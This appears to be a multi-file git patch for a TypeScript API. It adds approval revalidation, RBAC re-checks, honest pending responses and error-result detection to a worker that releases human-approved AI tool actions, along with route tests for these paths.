+  // Step 2: load the intent + its winning approval row. Both are fast local
+  // reads with no external I/O, so they share one short system-scoped
+  // transaction — mirrors intentOutboxPublisher.ts's phase discipline
+  // (DB-only work gets its own short context; the network/tool-execution
+  // step below runs in its own, entirely separate, context boundary so a
+  // slow external call never pins a pooled connection idle-in-transaction).
+  const { intent, winningApproval } = await withSystemDbAccessContext(async () => {
+    const [intentRow] = await db
+      .select()
+      .from(actionIntents)
+      .where(eq(actionIntents.id, intentId))
+      .limit(1);
+    if (!intentRow) {
+      return { intent: null as ActionIntent | null, winningApproval: null };
+    }
+    const [approvalRow] = await db
+      .select({
+        id: approvalRequests.id,
+        status: approvalRequests.status,
+        boundArgumentDigest: approvalRequests.boundArgumentDigest,
+      })
+      .from(approvalRequests)
+      .where(and(eq(approvalRequests.intentId, intentId), eq(approvalRequests.status, 'approved')))
+      .limit(1);
+    return { intent: intentRow, winningApproval: approvalRow ?? null };
+  });
+
+  if (!intent) {
+    // Unreachable in practice — the CAS above requires the row to exist —
+    // but there is nothing to CAS to failed if the row itself is gone, so
+    // just log and stop rather than throwing out of a BullMQ processor.
+    console.error(`[IntentReleaseWorker] intent ${intentId} not found after CAS to executing`);
+    return;
+  }
+
+  // Revalidation chain (spec §5 step 2), IN ORDER. Each stop CASes
+  // executing -> failed with the exact error_code and returns WITHOUT ever
+  // calling executeTool.
+
+  // (a) The winning approval row must still be approved and must have
+  // approved the SAME content the intent currently carries. Should be
+  // impossible in practice (action_intents content is immutable, enforced
+  // by a DB trigger) — this is defense-in-depth, exactly as the spec's
+  // failure-mode table (§8) frames it.
+  if (!winningApproval || winningApproval.boundArgumentDigest !== intent.argumentDigest) {
+    await failIntent(intent, 'digest_mismatch');
+    return;
+  }
+
+  // (b) The tool must still exist and must not have been reclassified to a
+  // HIGHER tier since the intent was created (a lower/equal tier is fine —
+  // it only ever tightens, never loosens, what the approval covered).
+  const currentTier = getToolTier(intent.actionName);
+  if (currentTier === undefined || currentTier > intent.riskTier) {
+    await failIntent(intent, 'tier_escalated', {
+      details: { currentTier: currentTier ?? null, intentRiskTier: intent.riskTier },
+    });
+    return;
+  }
+
+  // (c) The actor must still be valid: rebuilds the AuthContext from
+  // scratch, re-checking the user is active and still has org access.
+  const auth = await buildAuthContextForIntent(intent);
+  if (!auth) {
+    await failIntent(intent, 'actor_invalid');
+    return;
+  }
+
+  // (d) The org must still be active (not suspended/churned/deleted, and
+  // its owning partner must still be active too — getActiveOrgTenant
+  // cascades through getActivePartner).
+  const activeOrg = await getActiveOrgTenant(intent.orgId);
+  if (!activeOrg) {
+    await failIntent(intent, 'org_inactive');
+    return;
+  }
+
+  // Step 3: execute through the existing dispatch (guardrails, device
+  // gates, and whatever per-tool audit/ledger writes the handler itself
+  // makes) with the rebuilt context. Escape any inherited DB context first,
+  // then open the SAME org-scoped context a live request would run this
+  // call under (mirrors services/aiAgentSdkTools.ts's makeHandler /
+  // sessionHandler) so the tool handler's own `auth.orgCondition`-filtered
+  // reads see exactly the rebuilt actor's tenant scope — never a system-wide
+  // view, and never the short-lived system context the revalidation reads
+  // above used.
+  let rawResult: string;
+  try {
+    rawResult = await runOutsideDbContext(() =>
+      withDbAccessContext(dbAccessContextFromAuth(auth), () =>
+        executeTool(intent.actionName, intent.arguments, auth),
+      ),
+    );
+  } catch (err) {
+    console.error(`[IntentReleaseWorker] executeTool threw for intent ${intent.id}:`, err);
+    await failIntent(intent, 'execution_error', {
+      details: { error: err instanceof Error ? err.message : String(err) },
+      executed: true,
+    });
+    return;
+  }
+
+  // Step 4: cap the result to 64 KiB; oversize -> {truncated:true}, which
+  // still counts as a completion, never a failure.
+  const resultBytes = Buffer.byteLength(rawResult, 'utf8');
+  const truncated = resultBytes > MAX_RESULT_BYTES;
+  const storedResult: Record<string, unknown> = truncated ? { truncated: true } : normalizeToolResult(rawResult);
+
+  const completed = await transitionIntent(intent.id, 'executing', 'completed', {
+    executedAt: new Date(),
+    result: storedResult,
+  });
+
+  if (!completed) {
+    // Lost the executing -> completed CAS AFTER executeTool already ran and
+    // had its real-world side effect (e.g. the stale-executing reaper beat
+    // us to failed:execution_lost on an extremely slow tool call, or a
+    // duplicate delivery raced this one to the terminal state first). The
+    // side effect already happened and cannot be undone; there is nothing
+    // more to CAS, but this is worth surfacing — it means the result this
+    // execution produced is not recorded anywhere on the intent.
+    console.error(
+      `[IntentReleaseWorker] Lost the executing->completed CAS for intent ${intent.id} — `
+      + 'a reaper or duplicate delivery likely already terminalized it; the tool DID execute',
+    );
+    captureException(new Error(`intent ${intent.id} executed but lost the completed CAS`));
+    return;
+  }
+
+  try {
+    recordActionIntentEvent({
+      orgId: intent.orgId,
+      intentId: intent.id,
+      actionName: intent.actionName,
+      argumentDigest: intent.argumentDigest,
+      source: intent.source,
+      outcome: 'executed',
+      details: { truncated, resultBytes },
+    });
+  } catch (err) {
+    console.error(`[IntentReleaseWorker] Failed to write success audit for intent ${intent.id}:`, err);
+    captureException(err instanceof Error ? err : new Error(String(err)));
+  }
+}
+
+/**
+ * One job's worth of dispatch logic, factored out of the Worker processor so
+ * it can be unit tested without spinning up a real BullMQ Worker. Only
+ * `intent_approved` is a release trigger — `intent_created` (also published
+ * to this same queue by intentOutboxPublisher.ts, which this worker shares
+ * a queue with but not a consumer role) is acknowledged as a no-op rather
+ * than thrown on, so it doesn't retry forever.
+ */
+export async function processIntentReleaseJob(data: IntentReleaseJobData): Promise<{ released: boolean }> {
+  if (data.eventType !== 'intent_approved') {
+    return { released: false };
+  }
+  await releaseApprovedIntent(data.intentId);
+  return { released: true };
+}
+
+function createWorker(): Worker<IntentReleaseJobData> {
+  return new Worker<IntentReleaseJobData>(
+    ACTION_INTENTS_QUEUE_NAME,
+    async (job: Job<IntentReleaseJobData>) => {
+      try {
+        return await processIntentReleaseJob(job.data);
+      } catch (err) {
+        console.error(`[IntentReleaseWorker] Job ${job.id} (intent ${job.data.intentId}) failed:`, err);
+        captureException(err instanceof Error ? err : new Error(String(err)));
+        throw err;
+      }
+    },
+    {
+      connection: getBullMQConnection(),
+      // Unlike the reapers (concurrency: 1 — cheap, purely-DB sweeps), this
+      // worker's executeTool step can block on slow external calls (M365/
+      // Google APIs, agent command round-trips, ticketing systems). Modest
+      // parallelism so one slow release doesn't stall the whole queue, while
+      // staying well below a level that could hammer downstream systems.
+      concurrency: 5,
+    },
+  );
+}
+
+export async function initializeIntentReleaseWorker(): Promise<void> {
+  if (releaseWorker) return;
+
+  releaseWorker = createWorker();
+  releaseWorker.on('error', (error) => {
+    console.error('[IntentReleaseWorker] Worker error:', error);
+    captureException(error);
+  });
+  releaseWorker.on('failed', (job, error) => {
+    console.error(`[IntentReleaseWorker] Job ${job?.id} failed:`, error);
+    captureException(error);
+  });
+
+  console.log('[IntentReleaseWorker] Initialized');
+}
+
+export async function shutdownIntentReleaseWorker(): Promise<void> {
+  const worker = releaseWorker;
+  releaseWorker = null;
+
+  if (worker) {
+    try {
+      await worker.close();
+    } catch (err) {
+      console.error('[IntentReleaseWorker] Error closing worker:', err);
+    }
+  }
+}

--- a/apps/api/src/jobs/intentReleaseWorker.ts
+++ b/apps/api/src/jobs/intentReleaseWorker.ts
@@ -11,6 +11,7 @@ import { transitionIntent } from '../services/actionIntents/intentService';
 import { buildAuthContextForIntent } from '../services/actionIntents/actorContext';
 import { getActiveOrgTenant } from '../services/tenantStatus';
 import { getToolTier, executeTool } from '../services/aiTools';
+import { checkToolPermission } from '../services/aiGuardrails';
 import { dbAccessContextFromAuth } from '../middleware/auth';
 
 /**
@@ -229,6 +230,23 @@ export async function releaseApprovedIntent(intentId: string): Promise<void> {
   const activeOrg = await getActiveOrgTenant(intent.orgId);
   if (!activeOrg) {
     await failIntent(intent, 'org_inactive');
+    return;
+  }
+
+  // (e) The actor must STILL hold the specific RBAC permission the tool
+  // requires, checked against the rebuilt `auth` from step (c) — not the
+  // caller's original, now possibly stale, permission check. This is the
+  // core durability guarantee (spec §5 "user active with required RBAC";
+  // §10.3 "approval is not a timeless bearer capability"): an intent can sit
+  // `approved` for minutes to (mcp_api, 24h expiry) hours, and the actor may
+  // have been demoted to a lesser role in that window while remaining an
+  // active org member (which alone only trips (c) `actor_invalid`).
+  // `buildAuthContextForIntent` populates `auth.token.roleId` from freshly
+  // resolved permissions (never null for a real user), so this call cannot
+  // fail open via checkToolPermission's helper-session bypass.
+  const permissionDenial = await checkToolPermission(intent.actionName, intent.arguments, auth);
+  if (permissionDenial) {
+    await failIntent(intent, 'rbac_denied', { details: { reason: permissionDenial } });
     return;
   }
 

--- a/apps/api/src/jobs/intentReleaseWorker.ts
+++ b/apps/api/src/jobs/intentReleaseWorker.ts
@@ -71,6 +71,34 @@ function normalizeToolResult(raw: string): Record<string, unknown> {
 }
 
 /**
+ * A tool handler can return successfully (no thrown error) but hand back a JSON
+ * body that IS an error — validation failures, device/org access-denied, etc.
+ * (`executeTool` returns `JSON.stringify({ error })` for these; see aiTools.ts).
+ * The chat SDK's makeHandler (aiAgentSdkTools.ts) flags exactly these as
+ * `isError`; the durable release worker MUST apply the SAME detection or a
+ * returned error gets recorded as a successful completion (a real audit-integrity
+ * bug — e.g. "device access revoked after approval" would read as success).
+ * Kept as a local duplicate of the SDK predicate for the same dependency-graph
+ * reason `normalizeToolResult` is (avoid dragging the chat-session graph into
+ * this worker); the two must stay in lockstep.
+ */
+function isReturnedToolError(raw: string): boolean {
+  try {
+    const parsed = JSON.parse(raw);
+    return (
+      !!parsed &&
+      typeof parsed === 'object' &&
+      'error' in parsed &&
+      !('success' in parsed) &&
+      !('data' in parsed) &&
+      !('configured' in parsed)
+    );
+  } catch {
+    return false;
+  }
+}
+
+/**
  * Writes the `action_intent.executed` audit row + Prometheus counter for a
  * FAILED release (any revalidation stop, or a thrown `executeTool`).
  *
@@ -242,6 +270,26 @@ export async function releaseApprovedIntent(intentId: string): Promise<void> {
   const resultBytes = Buffer.byteLength(rawResult, 'utf8');
   const truncated = resultBytes > MAX_RESULT_BYTES;
   const storedResult: Record<string, unknown> = truncated ? { truncated: true } : normalizeToolResult(rawResult);
+
+  // A tool that returned an error body (not a throw) is a FAILED release, not a
+  // completion — mirrors the chat SDK's isError handling. Store the result for
+  // diagnosis but terminalize as failed:tool_returned_error.
+  if (!truncated && isReturnedToolError(rawResult)) {
+    const failed = await transitionIntent(intent.id, 'executing', 'failed', {
+      executedAt: new Date(),
+      errorCode: 'tool_returned_error',
+      result: storedResult,
+    });
+    if (failed) {
+      auditReleaseFailure(intent, 'tool_returned_error', { returnedError: true });
+    } else {
+      // Lost the CAS after the tool ran — the side effect happened; surface it.
+      console.error(
+        `[IntentReleaseWorker] Lost the executing->failed CAS for intent ${intent.id} after a returned tool error`,
+      );
+    }
+    return;
+  }
 
   const completed = await transitionIntent(intent.id, 'executing', 'completed', {
     executedAt: new Date(),

--- a/apps/api/src/middleware/auth.ts
+++ b/apps/api/src/middleware/auth.ts
@@ -146,6 +146,50 @@ function isMfaEnrollmentExemptPath(path: string): boolean {
 }
 
 /**
+ * Build the AuthContext org-axis closures (`orgCondition`, `canAccessOrg`)
+ * from a resolved `accessibleOrgIds` list. `null` = unrestricted (system
+ * scope — no filter, always true); `[]` = no accessible orgs (impossible
+ * condition, always false); otherwise an equality or IN-list filter.
+ *
+ * Single source of truth for the org-axis closures, reused by the request
+ * path (authMiddleware, for all three scopes — `accessibleOrgIds` is already
+ * scope-resolved by `computeAccessibleOrgIds` by the time this runs) and by
+ * `services/actionIntents/actorContext.ts`, which reconstructs a one-org
+ * AuthContext (`accessibleOrgIds: [intent.orgId]`) for the durable release
+ * worker's revalidated actor — passing a single-element array here collapses
+ * to exactly the same `eq(orgIdColumn, orgId)` / identity-check shape
+ * authMiddleware produces for an organization-scope token, so the two paths
+ * can never drift.
+ */
+export function buildOrgAccessClosures(
+  accessibleOrgIds: string[] | null
+): {
+  orgCondition: (orgIdColumn: PgColumn) => SQL | undefined;
+  canAccessOrg: (orgId: string) => boolean;
+} {
+  const orgCondition = (orgIdColumn: PgColumn): SQL | undefined => {
+    if (accessibleOrgIds === null) {
+      return undefined; // System scope - no filter
+    }
+    if (accessibleOrgIds.length === 0) {
+      // No accessible orgs - return impossible condition
+      return eq(orgIdColumn, '00000000-0000-0000-0000-000000000000');
+    }
+    if (accessibleOrgIds.length === 1) {
+      return eq(orgIdColumn, accessibleOrgIds[0]);
+    }
+    return inArray(orgIdColumn, accessibleOrgIds);
+  };
+
+  const canAccessOrg = (orgId: string): boolean => {
+    if (accessibleOrgIds === null) return true; // System scope
+    return accessibleOrgIds.includes(orgId);
+  };
+
+  return { orgCondition, canAccessOrg };
+}
+
+/**
  * Compute which org IDs a user can access based on their scope.
  * Called once per request in authMiddleware.
  */
@@ -499,25 +543,10 @@ export async function authMiddleware(c: Context, next: Next): Promise<void | Res
     throw new HTTPException(401, { message: 'Invalid or expired token' });
   }
 
-  // Create helper functions
-  const orgCondition = (orgIdColumn: PgColumn): SQL | undefined => {
-    if (accessibleOrgIds === null) {
-      return undefined; // System scope - no filter
-    }
-    if (accessibleOrgIds.length === 0) {
-      // No accessible orgs - return impossible condition
-      return eq(orgIdColumn, '00000000-0000-0000-0000-000000000000');
-    }
-    if (accessibleOrgIds.length === 1) {
-      return eq(orgIdColumn, accessibleOrgIds[0]);
-    }
-    return inArray(orgIdColumn, accessibleOrgIds);
-  };
-
-  const canAccessOrg = (orgId: string): boolean => {
-    if (accessibleOrgIds === null) return true; // System scope
-    return accessibleOrgIds.includes(orgId);
-  };
+  // Create helper functions — buildOrgAccessClosures is the single source of
+  // truth (also reused by services/actionIntents/actorContext.ts to
+  // reconstruct a one-org AuthContext for the durable release worker).
+  const { orgCondition, canAccessOrg } = buildOrgAccessClosures(accessibleOrgIds);
 
   // Resolve the site-axis allowlist (sub-org restriction). Only organization
   // scope carries site restrictions (`organizationUsers.siteIds` via

--- a/apps/api/src/routes/ai.ts
+++ b/apps/api/src/routes/ai.ts
@@ -17,6 +17,7 @@ import {
   closeSession,
   getSessionMessages,
   handleApproval,
+  isIntentBackedExecution,
   searchSessions,
   listM365Connections,
   resolveDefaultModel
@@ -756,6 +757,21 @@ aiRoutes.post(
 
     const success = await handleApproval(executionId, approved, auth, sessionId);
     if (!success) {
+      // CRITICAL-3 (whole-branch review): a Tier-3 intent-backed execution
+      // NEVER reports success here — its real decision lives on
+      // action_intents.status, decided via the /approvals surface (mobile
+      // push or the Approvals queue), not this self-approve endpoint. Give
+      // the web chat client an honest "still pending" response instead of a
+      // generic "not found" so it can render a waiting state rather than
+      // silently timing out.
+      if (await isIntentBackedExecution(executionId)) {
+        return c.json({
+          success: false,
+          pending: true,
+          via: 'intent',
+          message: 'This action needs approval in the Approvals area or the Breeze mobile app.',
+        });
+      }
       return c.json({ error: 'Execution not found or already processed' }, 404);
     }
 

--- a/apps/api/src/routes/ai_sessions_actions.test.ts
+++ b/apps/api/src/routes/ai_sessions_actions.test.ts
@@ -83,6 +83,7 @@ vi.mock('../services/aiAgent', () => ({
   closeSession: vi.fn(),
   getSessionMessages: vi.fn(),
   handleApproval: vi.fn(),
+  isIntentBackedExecution: vi.fn(),
   searchSessions: vi.fn(),
 }));
 
@@ -125,6 +126,7 @@ import {
   closeSession,
   getSessionMessages,
   handleApproval,
+  isIntentBackedExecution,
   searchSessions,
 } from '../services/aiAgent';
 import { getUsageSummary, updateBudget, getSessionHistory } from '../services/aiCostTracker';
@@ -293,6 +295,7 @@ describe('AI routes', () => {
     it('returns 404 when execution not found', async () => {
       vi.mocked(getSession).mockResolvedValueOnce({ id: SESSION_ID, orgId: ORG_ID } as any);
       vi.mocked(handleApproval).mockResolvedValueOnce(false);
+      vi.mocked(isIntentBackedExecution).mockResolvedValueOnce(false);
 
       const res = await app.request(`/ai/sessions/${SESSION_ID}/approve/${EXEC_ID}`, {
         method: 'POST',
@@ -301,6 +304,30 @@ describe('AI routes', () => {
       });
 
       expect(res.status).toBe(404);
+    });
+
+    // CRITICAL-3 (whole-branch review): the web chat "Approve" button must
+    // never report success for a Tier-3 intent-backed execution — handleApproval
+    // refuses to flip it (four-eyes model), and the route must turn that
+    // refusal into an honest "pending" response, not silently claim success
+    // nor collapse it into the generic "not found" 404.
+    it('never reports success for an intent-backed execution — returns an honest pending response', async () => {
+      vi.mocked(getSession).mockResolvedValueOnce({ id: SESSION_ID, orgId: ORG_ID } as any);
+      vi.mocked(handleApproval).mockResolvedValueOnce(false);
+      vi.mocked(isIntentBackedExecution).mockResolvedValueOnce(true);
+
+      const res = await app.request(`/ai/sessions/${SESSION_ID}/approve/${EXEC_ID}`, {
+        method: 'POST',
+        headers: { 'Content-Type': 'application/json', Authorization: 'Bearer token' },
+        body: JSON.stringify({ approved: true }),
+      });
+
+      const body = await res.json();
+      expect(body.success).toBe(false);
+      expect(body.pending).toBe(true);
+      expect(body.via).toBe('intent');
+      // Never the plain "success: true" shape the non-intent branch returns.
+      expect(body.approved).toBeUndefined();
     });
   });
 

--- a/apps/api/src/routes/approvals.test.ts
+++ b/apps/api/src/routes/approvals.test.ts
@@ -368,6 +368,36 @@ describe('GET /approvals/:id', () => {
     expect(res.status).toBe(200);
     const body = await res.json();
     expect(body.approval.id).toBe('a1');
+    // Task 9: intentId defaults to null when the row has no intent link.
+    expect(body.approval.intentId).toBeNull();
+  });
+
+  it('serializes intentId so a consumer can correlate an approval row to its intent', async () => {
+    const approval = {
+      id: 'a1',
+      userId: TEST_USER.id,
+      requestingClientLabel: 'MCP API client',
+      requestingMachineLabel: null,
+      requestingClientId: null,
+      requestingSessionId: null,
+      actionLabel: 'Reboot devices',
+      actionToolName: 'breeze.devices.reboot',
+      actionArguments: {},
+      riskTier: 'low',
+      riskSummary: 'Low risk operation.',
+      status: 'pending',
+      expiresAt: new Date(Date.now() + 60_000),
+      decidedAt: null,
+      decisionReason: null,
+      intentId: 'intent-42',
+      createdAt: new Date(),
+    };
+    mockSelectResolves([approval]);
+
+    const res = await buildApp().request('/approvals/a1');
+    expect(res.status).toBe(200);
+    const body = await res.json();
+    expect(body.approval.intentId).toBe('intent-42');
   });
 });
 

--- a/apps/api/src/routes/approvals.test.ts
+++ b/apps/api/src/routes/approvals.test.ts
@@ -63,6 +63,20 @@ vi.mock('../services/actionIntents/metrics', () => ({
   recordActionIntentEvent: vi.fn(),
 }));
 
+// The decide handler re-resolves the DECIDER's live authorization before an
+// intent-backed approve (approvals:decide + org access). Mocked as a
+// collaborator with permissive defaults (a still-authorized approver); the
+// unauthorized-approver test overrides these to drive the 403.
+vi.mock('../services/permissions', () => ({
+  getUserPermissions: vi.fn(async () => ({
+    scope: 'organization',
+    orgId: 'org-1',
+    permissions: [{ resource: 'approvals', action: 'decide' }],
+  })),
+  userCanDecideApprovals: vi.fn(() => true),
+  canAccessOrg: vi.fn(() => true),
+}));
+
 vi.mock('../db/schema/elevations', () => ({
   elevationRequests: { id: 'id', orgId: 'org_id', status: 'status' },
   elevationAudit: { id: 'id', orgId: 'org_id', elevationRequestId: 'elevation_request_id' },
@@ -187,6 +201,7 @@ import { issueMobileAssertionNonce } from '../services/mobileHwKey';
 import { requireCurrentPasswordStepUp } from './auth/helpers';
 import { transitionIntent } from '../services/actionIntents/intentService';
 import { recordActionIntentEvent } from '../services/actionIntents/metrics';
+import { getUserPermissions, userCanDecideApprovals, canAccessOrg } from '../services/permissions';
 
 function buildApp() {
   const app = new Hono();
@@ -1291,6 +1306,52 @@ describe('Task 5: decide-handler bound to action_intents', () => {
     );
   });
 
+  it('refuses an intent-linked APPROVE (403) when the decider no longer holds approvals:decide', async () => {
+    // A demoted approver: their fanned-out row is still visible (they keep org
+    // membership) but they lost approvals:decide. The decide-time re-check must
+    // fail closed before the CAS, so the intent is never transitioned.
+    mockDecideWithIntent({ requestedByUserId: 'requester-1' });
+    vi.mocked(userCanDecideApprovals).mockReturnValueOnce(false);
+
+    const res = await buildApp().request('/approvals/appr-1/approve', { method: 'POST' });
+    expect(res.status).toBe(403);
+    expect(transitionIntent).not.toHaveBeenCalled();
+    expect(recordActionIntentEvent).toHaveBeenCalledWith(
+      expect.objectContaining({ intentId: 'intent-1', outcome: 'approver_unauthorized' }),
+    );
+  });
+
+  it('refuses an intent-linked APPROVE (403) when the decider lost access to the intent org', async () => {
+    mockDecideWithIntent({ requestedByUserId: 'requester-1' });
+    vi.mocked(canAccessOrg).mockReturnValueOnce(false);
+
+    const res = await buildApp().request('/approvals/appr-1/approve', { method: 'POST' });
+    expect(res.status).toBe(403);
+    expect(transitionIntent).not.toHaveBeenCalled();
+  });
+
+  it('still allows an intent-linked DENY from a decider who lost approvals:decide (deny is harmless)', async () => {
+    // Deny cancels the action — it never drives a release — so a demoted
+    // approver denying must stay available (the re-check is approve-only).
+    mockDecideWithIntent({ requestedByUserId: 'requester-1' });
+    mockIntentFanInTx();
+    vi.mocked(userCanDecideApprovals).mockReturnValue(false);
+
+    const res = await buildApp().request('/approvals/appr-1/deny', {
+      method: 'POST',
+      headers: { 'content-type': 'application/json' },
+      body: JSON.stringify({ reason: 'no' }),
+    });
+    expect(res.status).toBe(200);
+    expect(transitionIntent).toHaveBeenCalledWith(
+      'intent-1',
+      'pending_approval',
+      'rejected',
+      expect.anything(),
+    );
+    vi.mocked(userCanDecideApprovals).mockReturnValue(true);
+  });
+
   it('denying an intent-linked row transitions the intent to rejected, expires siblings, and writes NO outbox row', async () => {
     mockDecideWithIntent({ requestedByUserId: 'requester-1' });
     const { siblingSet, tx } = mockIntentFanInTx();
@@ -1502,6 +1563,49 @@ describe('POST /approvals/:id/report-suspicious', () => {
 
     const res = await buildApp().request('/approvals/missing/report-suspicious', { method: 'POST' });
     expect(res.status).toBe(404);
+  });
+
+  it('rejects the linked action intent and expires sibling approvals for an intent-backed row', async () => {
+    // Intent-backed rows carry intentId (not executionId). A suspicious report
+    // must reject the whole intent and expire siblings so another approver's
+    // still-pending row cannot approve the flagged action.
+    const intentRow = { ...baseRow, executionId: null, intentId: 'intent-77', requestingClientId: null };
+
+    // 1) find existing approval
+    vi.mocked(db.select).mockReturnValueOnce({
+      from: vi.fn().mockReturnValue({
+        where: vi.fn().mockResolvedValue([intentRow]),
+      }),
+    } as any);
+    // 2) update approval_requests -> reported
+    vi.mocked(db.update).mockReturnValueOnce({
+      set: vi.fn().mockReturnValue({ where: vi.fn().mockResolvedValue(undefined) }),
+    } as any);
+    // 3) sibling-expiry update (inside system context)
+    const siblingSet = vi.fn().mockReturnValue({ where: vi.fn().mockResolvedValue(undefined) });
+    vi.mocked(db.update).mockReturnValueOnce({ set: siblingSet } as any);
+    // 4) intent load (for orgId, inside system context)
+    vi.mocked(db.select).mockReturnValueOnce({
+      from: vi.fn().mockReturnValue({
+        where: vi.fn().mockReturnValue({
+          limit: vi.fn().mockResolvedValue([{ orgId: 'org-9', actionName: 'y', argumentDigest: 'd', source: 'mcp_api' }]),
+        }),
+      }),
+    } as any);
+    vi.mocked(db.insert).mockReturnValue({ values: vi.fn().mockResolvedValue(undefined) } as any);
+
+    const res = await buildApp().request('/approvals/a1/report-suspicious', { method: 'POST' });
+    expect(res.status).toBe(204);
+    expect(transitionIntent).toHaveBeenCalledWith(
+      'intent-77',
+      'pending_approval',
+      'rejected',
+      expect.objectContaining({ decidedByUserId: TEST_USER.id }),
+    );
+    expect(siblingSet).toHaveBeenCalledWith(expect.objectContaining({ status: 'expired' }));
+    expect(recordActionIntentEvent).toHaveBeenCalledWith(
+      expect.objectContaining({ intentId: 'intent-77', outcome: 'rejected' }),
+    );
   });
 
   it('returns 401 when auth middleware rejects (permission denied)', async () => {

--- a/apps/api/src/routes/approvals.test.ts
+++ b/apps/api/src/routes/approvals.test.ts
@@ -32,8 +32,35 @@ vi.mock('../db/schema/approvals', () => ({
   approvalRequests: {
     id: 'id',
     elevationRequestId: 'elevation_request_id',
+    intentId: 'intent_id',
     status: 'status',
   },
+}));
+
+vi.mock('../db/schema/actionIntents', () => ({
+  actionIntents: {
+    id: 'id',
+    orgId: 'org_id',
+    status: 'status',
+  },
+  intentOutbox: {
+    id: 'id',
+    intentId: 'intent_id',
+    eventType: 'event_type',
+    payload: 'payload',
+  },
+}));
+
+// Task 5: decide-handler extension mirrors the CAS onto the linked
+// action_intents row. Mocked as a collaborator (like assertApprovalAssurance)
+// so these route tests exercise decideHandler's own wiring, not
+// transitionIntent's internals (covered by intentService.test.ts).
+vi.mock('../services/actionIntents/intentService', () => ({
+  transitionIntent: vi.fn(async () => true),
+}));
+
+vi.mock('../services/actionIntents/metrics', () => ({
+  recordActionIntentEvent: vi.fn(),
 }));
 
 vi.mock('../db/schema/elevations', () => ({
@@ -158,6 +185,8 @@ import { assertApprovalAssurance, StepUpRequiredError, ReauthRequiredError } fro
 import { generateApprovalAssertionOptions } from '../services/approverWebAuthn';
 import { issueMobileAssertionNonce } from '../services/mobileHwKey';
 import { requireCurrentPasswordStepUp } from './auth/helpers';
+import { transitionIntent } from '../services/actionIntents/intentService';
+import { recordActionIntentEvent } from '../services/actionIntents/metrics';
 
 function buildApp() {
   const app = new Hono();
@@ -251,6 +280,10 @@ beforeEach(() => {
   // Re-establish the default "password ok" (null = no error) after clearAllMocks
   // wipes the factory implementation; per-case overrides set their own.
   vi.mocked(requireCurrentPasswordStepUp).mockResolvedValue(null);
+  // Task 5: default the intent CAS to "won the race" so non-race-focused
+  // tests don't have to wire it explicitly; the first-wins test overrides
+  // this to false.
+  vi.mocked(transitionIntent).mockResolvedValue(true);
   vi.mocked(authMiddleware).mockImplementation((c: any, next: any) => {
     c.set('auth', {
       scope: 'partner',
@@ -1110,6 +1143,241 @@ describe('#1254 PAM mobile bridge: mirror decision back to elevation', () => {
 
     const res = await buildApp().request('/approvals/appr-1/approve', { method: 'POST' });
     expect(res.status).toBe(200);
+  });
+});
+
+describe('Task 5: decide-handler bound to action_intents', () => {
+  // Wires the decideHandler flow for an intent-linked approval row:
+  //   1) pre-fetch select (approval_requests, carries intentId + boundArgumentDigest)
+  //   2) intent load select (action_intents, by id, system context)
+  //   3) approval_requests CAS update
+  // transitionIntent (the intent CAS) is mocked at the module level, not
+  // wired through db — see the collaborator-mock comment at the top of the
+  // file. requestedByUserId defaults to someone OTHER than TEST_USER so the
+  // sole-operator gate doesn't fire unless a test opts in.
+  function mockDecideWithIntent(opts: {
+    riskTier?: string;
+    requestedByUserId?: string;
+    boundArgumentDigest?: string | null;
+    intentDigest?: string;
+  }) {
+    const approvalRow = {
+      id: 'appr-1',
+      userId: TEST_USER.id,
+      requestingClientLabel: 'MCP API client',
+      requestingMachineLabel: null,
+      requestingClientId: null,
+      requestingSessionId: null,
+      actionLabel: 'x',
+      actionToolName: 'y',
+      actionArguments: {},
+      riskTier: opts.riskTier ?? 'high',
+      riskSummary: 'z',
+      status: 'pending',
+      expiresAt: new Date(Date.now() + 60_000),
+      decidedAt: null,
+      decisionReason: null,
+      executionId: null,
+      elevationRequestId: null,
+      intentId: 'intent-1',
+      boundArgumentDigest:
+        opts.boundArgumentDigest === undefined ? 'digest-abc' : opts.boundArgumentDigest,
+      isRecursive: false,
+      createdAt: new Date(),
+    };
+
+    const intentRow = {
+      id: 'intent-1',
+      orgId: 'org-9',
+      actionName: 'y',
+      argumentDigest: opts.intentDigest ?? 'digest-abc',
+      source: 'mcp_api',
+      status: 'pending_approval',
+      requestedByUserId: opts.requestedByUserId ?? 'requester-1',
+    };
+
+    // 1) pre-fetch select
+    vi.mocked(db.select).mockReturnValueOnce({
+      from: vi.fn().mockReturnValue({
+        where: vi.fn().mockResolvedValue([approvalRow]),
+      }),
+    } as any);
+    // 2) intent load select (system context, by id)
+    vi.mocked(db.select).mockReturnValueOnce({
+      from: vi.fn().mockReturnValue({
+        where: vi.fn().mockResolvedValue([intentRow]),
+      }),
+    } as any);
+
+    // 3) approval_requests CAS update
+    const casReturning = vi.fn().mockResolvedValue([{ ...approvalRow, status: 'approved' }]);
+    const casSet = vi.fn().mockReturnValue({
+      where: vi.fn().mockReturnValue({ returning: casReturning }),
+    });
+    vi.mocked(db.update).mockReturnValueOnce({ set: casSet } as any);
+
+    return { approvalRow, intentRow, casSet };
+  }
+
+  // The post-CAS fan-in (sibling expiry + intent_approved outbox insert)
+  // runs inside `db.transaction` under system context. Captures both calls.
+  function mockIntentFanInTx() {
+    const siblingSet = vi.fn().mockReturnValue({ where: vi.fn().mockResolvedValue(undefined) });
+    const outboxValues = vi.fn().mockResolvedValue(undefined);
+    const tx = {
+      update: vi.fn(() => ({ set: siblingSet }) as any),
+      insert: vi.fn(() => ({ values: outboxValues }) as any),
+    };
+    vi.mocked(db.transaction).mockImplementation(async (fn: any) => fn(tx));
+    return { siblingSet, outboxValues, tx };
+  }
+
+  it('approving an intent-linked row transitions the intent, writes an intent_approved outbox row, and expires siblings', async () => {
+    mockDecideWithIntent({ requestedByUserId: 'requester-1' });
+    const { siblingSet, outboxValues, tx } = mockIntentFanInTx();
+
+    const res = await buildApp().request('/approvals/appr-1/approve', { method: 'POST' });
+    expect(res.status).toBe(200);
+
+    expect(transitionIntent).toHaveBeenCalledWith(
+      'intent-1',
+      'pending_approval',
+      'approved',
+      expect.objectContaining({ decidedByUserId: TEST_USER.id }),
+    );
+    expect(siblingSet).toHaveBeenCalledWith(
+      expect.objectContaining({ status: 'expired' }),
+    );
+    expect(outboxValues).toHaveBeenCalledWith(
+      expect.objectContaining({
+        intentId: 'intent-1',
+        eventType: 'intent_approved',
+        payload: { intentId: 'intent-1', orgId: 'org-9' },
+      }),
+    );
+    expect(tx.insert).toHaveBeenCalledTimes(1);
+    expect(recordActionIntentEvent).toHaveBeenCalledWith(
+      expect.objectContaining({ orgId: 'org-9', intentId: 'intent-1', outcome: 'approved' }),
+    );
+  });
+
